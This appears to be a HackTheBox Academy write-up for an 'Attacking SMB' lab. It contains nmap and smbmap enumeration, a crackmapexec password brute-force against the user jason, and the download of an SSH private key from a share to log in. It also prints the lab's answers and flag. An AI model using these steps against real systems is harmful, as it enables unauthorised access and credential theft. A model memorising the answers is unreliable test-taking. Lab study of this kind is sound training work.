Attacking SMB
ℹ️ Informations¶
- 🌐 Website: HackTheBox
- 📚 Module: Attacking Common Services
- 🔗 Link: Attacking SMB
❓Question¶
What is the name of the shared folder with READ permissions?
📋 Walkthrough¶
To identify the shared folders on the target machine, we first perform an Nmap scan to detect open ports and services.
└─$ nmap -sC -sV 10.129.203.6
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-20 15:46 UTC
Nmap scan report for 10.129.203.6
Host is up (0.026s latency).
Not shown: 995 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 71:08:b0:c4:f3:ca:97:57:64:97:70:f9:fe:c5:0c:7b (RSA)
| 256 45:c3:b5:14:63:99:3d:9e:b3:22:51:e5:97:76:e1:50 (ECDSA)
|_ 256 2e:c2:41:66:46:ef:b6:81:95:d5:aa:35:23:94:55:38 (ED25519)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.16.1-Ubuntu
139/tcp open netbios-ssn Samba smbd 4
445/tcp open netbios-ssn Samba smbd 4
2121/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (InlaneFTP) [10.129.203.6]
| Invalid command: try being more creative
| Invalid command: try being more creative
| NULL:
|_ 220 ProFTPD Server (InlaneFTP) [10.129.203.6]
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port2121-TCP:V=7.95%I=7%D=3/20%Time=67DC3875%P=x86_64-pc-linux-gnu%r(NU
SF:LL,2F,"220\x20ProFTPD\x20Server\x20\(InlaneFTP\)\x20\[10\.129\.203\.6\]
SF:\r\n")%r(GenericLines,8B,"220\x20ProFTPD\x20Server\x20\(InlaneFTP\)\x20
SF:\[10\.129\.203\.6\]\r\n500\x20Invalid\x20command:\x20try\x20being\x20mo
SF:re\x20creative\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x2
SF:0creative\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: -1h00m04s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: ATTCSVC-LINUX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2025-03-20T14:47:23
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.94 seconds
From the Nmap scan, we see that SMB is running on ports 139 and 445.
Next, we use smbmap to enumerate the SMB shares and their permissions.
┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ smbmap -H 10.129.203.6
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 0 authenticated session(s)
[+] IP: 10.129.203.6:445 Name: 10.129.203.6 Status: NULL Session
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
GGJ READ ONLY Priv
IPC$ NO ACCESS IPC Service (attcsvc-linux Samba)
[*] Closed 1 connections
The output shows that the shared folder GGJ has READ ONLY permissions.
Answer
GGJ
❓Question¶
What is the password for the username "jason"?
📋 Walkthrough¶
To find the password for the user "jason", we use crackmapexec with a password list to perform a brute-force attack.
┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ crackmapexec smb 10.129.203.6 -u "jason" -p pws.list --local-auth
SMB 10.129.203.6 445 ATTCSVC-LINUX [*] Windows 6.1 Build 0 (name:ATTCSVC-LINUX) (domain:ATTCSVC-LINUX) (signing:False) (SMBv1:False)
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:liverpool STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:theman STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:bandit STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:dolphins STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:maddog STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:packers STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:jaguar STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:lovers STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:nicholas STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:united STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:tiffany STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:maxwell STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:zzzzzz STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:nirvana STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:jeremy STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:suckit STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:stupid STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:porn STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:monica STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:elephant STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:giants STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:jackass STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:hotdog STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:rosebud STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:success STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:debbie STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:mountain STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:444444 STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:xxxxxxxx0 STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:warrior STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [-] ATTCSVC-LINUX\jason:1q2w3e4r5t STATUS_LOGON_FAILURE
SMB 10.129.203.6 445 ATTCSVC-LINUX [+] ATTCSVC-LINUX\jason:34c8zuNBo91!@28Bszh
The password for the user "jason" is found to be 34c8zuNBo91!@28Bszh.
Answer
34c8zuNBo91!@28Bszh
❓Question¶
Login as the user "jason" via SSH and find the flag.txt file. Submit the contents as your answer.
📋 Walkthrough¶
First, we download the private SSH key from the SMB share using smbmap.
┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ smbmap -H 10.129.203.6 -r --download "GGJ\id_rsa" -u jason -p "34c8zuNBo91\!@28Bszh"
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] Starting download: GGJ\id_rsa (3381 bytes)
[+] File output to: /home/kali/Desktop/HTB/Academy/10.129.203.6-GGJ_id_rsa
[*] Closed 1 connections
Next, we change the permissions of the downloaded key to make it usable.
Finally, we use the SSH key to log in as "jason" and read the flag.txt file.
┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ ssh jason@10.129.203.6 -i 10.129.203.6-GGJ_id_rsa
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-109-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu 20 Mar 2025 03:01:21 PM UTC
System load: 0.0 Processes: 231
Usage of /: 25.6% of 13.72GB Users logged in: 0
Memory usage: 15% IPv4 address for ens160: 10.129.203.6
Swap usage: 0%
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
0 updates can be applied immediately.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Apr 19 21:50:46 2022 from 10.10.14.20
$ cat flag.txt
HTB{SMB_4TT4CKS_2349872359}
$
Answer
HTB{SMB_4TT4CKS_2349872359}